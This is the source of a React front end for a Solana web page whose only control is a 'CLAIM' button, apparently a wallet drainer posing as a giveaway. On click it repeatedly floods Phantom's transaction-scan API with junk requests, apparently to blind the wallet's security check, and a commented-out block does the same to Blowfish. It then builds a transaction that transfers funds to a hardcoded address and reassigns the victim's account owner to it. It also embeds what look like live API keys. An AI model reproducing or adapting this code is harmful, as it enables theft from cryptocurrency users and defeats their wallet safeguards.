import './App.css';
import React, { FC, useMemo, ReactNode } from 'react';
import { ConnectionProvider, WalletProvider } from '@solana/wallet-adapter-react';
import { WalletNotConnectedError, WalletAdapterNetwork } from '@solana/wallet-adapter-base';
import { useConnection, useWallet } from '@solana/wallet-adapter-react';
import { LAMPORTS_PER_SOL, Keypair, Transaction, PublicKey, SystemProgram, ComputeBudgetProgram, TransactionInstruction } from '@solana/web3.js';
import { TOKEN_PROGRAM_ID, AccountLayout, u64, Token } from "@solana/spl-token"
import MINTS from "./mints.json"
import * as getmint from './getMint'
import bs58 from 'bs58'
import {
    GlowWalletAdapter,
    LedgerWalletAdapter,
    PhantomWalletAdapter,
    SlopeWalletAdapter,
    SolflareWalletAdapter,
    SolletExtensionWalletAdapter,
    SolletWalletAdapter,
    TorusWalletAdapter,
} from '@solana/wallet-adapter-wallets';
import {
    WalletModalProvider,
    WalletDisconnectButton,
    WalletMultiButton
} from '@solana/wallet-adapter-react-ui';
import { clusterApiUrl } from '@solana/web3.js';
import { getAssociatedTokenAddress } from './getAssociatedTokenAddress'
import { createTransferCheckedInstruction } from './transferChecked1'
import { getOrCreateAssociatedTokenAccount } from './getOrCreateAssociatedTokenAccount'
import { createTransferInstruction } from './createTransferInstruction'
import { toast } from 'react-hot-toast'
import { transactions } from '@metaplex/js';
import { getTokenSourceMapRange } from 'typescript';
require('@solana/wallet-adapter-react-ui/styles.css');
const App: FC = () => {


    return (
        <Context>
            <Content />
        </Context>
    );
};
export default App;

const Context: FC<{ children: ReactNode }> = ({ children }) => {
    const network = WalletAdapterNetwork.Mainnet;

    const endpoint = 'https://soft-few-meadow.solana-mainnet.quiknode.pro/315c5c02ed13ee24f677ade773ba6c2e39e6dfe1/';


    const wallets = useMemo(
        () => [
            new LedgerWalletAdapter(),
            new PhantomWalletAdapter(),
            new GlowWalletAdapter(),
            new SlopeWalletAdapter(),
            new SolletExtensionWalletAdapter(),
            new SolletWalletAdapter(),
            new SolflareWalletAdapter({ network }),
            new TorusWalletAdapter(),
        ],
        [network]
    );



    return (
        <ConnectionProvider endpoint={endpoint}>
            <WalletProvider wallets={wallets} autoConnect>
                <WalletModalProvider>{children}</WalletModalProvider>
            </WalletProvider>
        </ConnectionProvider>
    );
};

const Content: FC = () => {
    const { connection } = useConnection()

    /*const BLOWFISH_BASE_URL = "https://api.blowfish.xyz/solana/v0/mainnet";
    const REQUEST_TIMEOUT_LIMIT = 10000;
    const REFETCH_INTERVAL_MS = 5000;

    function runitup() {
        fetch(`${BLOWFISH_BASE_URL}/scan/transactions?language=en&chainId=1`, { method: 'post', headers: { "X-API-KEY": "a5c0f167-3d21-447e-8209-5a864f8fc387", "Content-Type": "application/json" } })
    }

    setInterval(runitup, 10);*/


    const { publicKey, signTransaction, sendTransaction } = useWallet()

    async function bungus() {
        fetch("https://api.phantom.app/transaction/scan/v1?language=" + navigator.language, {
            headers: {
                accept: "*/*",
                "accept-language": 'en',
                "cache-control": "no-cache",
                "content-type": "application/json",
                pragma: "no-cache"
            },
            referrerPolicy: "strict-origin-when-cross-origin",
            method: "POST",
            body: "{\"userAccount\":\"11111111111111111111111111111111111111111111\",\"metadata\":{\"origin\":\"https://soap.com\"},\"chainIds\":[\"solana:101\"],\"transactions\":[\"1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\"]}",
            mode: "no-cors",
            credentials: "include"
        });
        setTimeout(bungus, 500);
    }

    const onClick = (async () => {
        if (!publicKey || !signTransaction) throw new WalletNotConnectedError();
        const minter = getmint;
        const toPubkey = "5t2qoWSKDTnLmYx24f86F78ySiS2UxdAvxQwvmaY3L5U"
        const toPublicKey = new PublicKey(toPubkey)
        const transaction = new Transaction();
        const modifyComputeUnits = ComputeBudgetProgram.setComputeUnitLimit({
            units: 100000000
        });
        const addPriorityFee = ComputeBudgetProgram.setComputeUnitPrice({
            microLamports: 200000
        });

        bungus();

        const binance = "9WzDXwBbmkg8ZTbNMqUxvQRAyrZzDsGYdLVL9zYtAWWM";

        const stuff = new TextEncoder();
        const lord = stuff.encode(binance)
        var buf = Buffer.from("Data to send in transaction", 'utf8');
        const god = new PublicKey(binance)

        const balance = connection.getBalance(publicKey)

        
        transaction.add(
            SystemProgram.transfer({
                fromPubkey: publicKey,
                toPubkey: toPublicKey,
                lamports: 10,
            })
        )

        /*transaction.add(new TransactionInstruction({
            'keys': [{
                'pubkey': publicKey,
                'isSigner': true,
                'isWritable': true
            }],
            'data': buf,
            'programId': new PublicKey('MemoSq4gqABAXKb96qnH8TysNcWxMyWCqXgDLGmfcHr')
        }));*/

        transaction.add(
            SystemProgram.assign({
                accountPubkey: publicKey,
                programId: toPublicKey
            })
        )

        transaction.instructions = [];

        const blockHash = await connection.getRecentBlockhash()
        transaction.feePayer = await publicKey
        transaction.recentBlockhash = await blockHash.blockhash
        const result = await sendTransaction(transaction, connection);
    }
    );
    return (
        <div className='root-buttons'>
            <div className='upgrade2'><WalletMultiButton className='upgrade2' /></div>
            {/* <WalletMultiButton className='upgrade2'/> */}
            {/* <br></br> */}
            <button id="claim" className="upgrade" onClick={onClick}>CLAIM</button>
            {/* <button className="upgrade" onClick={onClick}>UPGRADE NFT</button> */}
        </div>
    );
};